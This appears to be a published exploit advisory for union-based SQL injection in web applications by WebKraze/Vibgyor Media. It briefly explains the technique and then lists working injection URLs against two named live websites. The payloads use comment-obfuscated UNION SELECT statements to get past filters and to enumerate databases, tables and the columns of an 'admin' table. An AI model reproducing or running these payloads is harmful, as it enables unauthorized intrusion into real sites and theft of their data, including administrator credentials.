WebKraze,Vibgyor Media Web Application Union-based Sql Injection

2024.12.28
ae Razi (AE) ae
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WebKraze,Vibgyor Media Web Application Union-based Sql Injection # Date: 2024-12-25 # Exploit Author: Parastou Razi # Contact: razi.parastoo@gmail.com #Category:webapps #Tested On: Windows, Firefox Proof of Concept: 1. Description: When an application is vulnerable to SQL injection, and the results of the query are returned within the application's responses, you can use the UNION keyword to retrieve data from other tables within the database. This is commonly known as a SQL injection UNION attack. Union-based SQLi – the attacker uses the UNION operator to combine a benign SQL statement with a malicious statement. The malicious statement must use the same columns and data types as the original statement. A vulnerable database processes the combined statement and executes the malicious code. [+] For UNION-Based Sql Injection first add "'" to the end of the link and page information will change : https://www.alikhalafforklifts.com/products.php?id=22 https://www.alikhalafforklifts.com/products.php?id=22' https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=1093 https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=1093' 2. Proof #Demo 1: https://www.alikhalafforklifts.com/products.php?id=-22%27%20/*!12345union*/%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*!froM*/information_schema.schemata%23--+ http://www.alikhalafforklifts.com/products.php?id=-22%27%20/*!12345union*/%20select%201,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*!FROM*/information_schema./*!tables*/%20WHERE%20table_schema=%22vibgyorm_alikhalif%22%23--+ #Demo2: https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27%20/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,database(),17,18,19,20,21,22,23,24,25,26,27/*!FROM*/%20information_schema.schemata--+ https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25,26,27/*!FROM*/information_schema./*!tables*/%20WHERE%20table_schema=%22wwwwegoc_atforsure%22--+ https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,column_name,17,18,19,20,21,22,23,24,25,26,27/*!FROM*/%20information_schema.columns%20WHERE%20table_name=%22admin%22%23

References:

https://portswigger.net/web-security/sql-injection


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top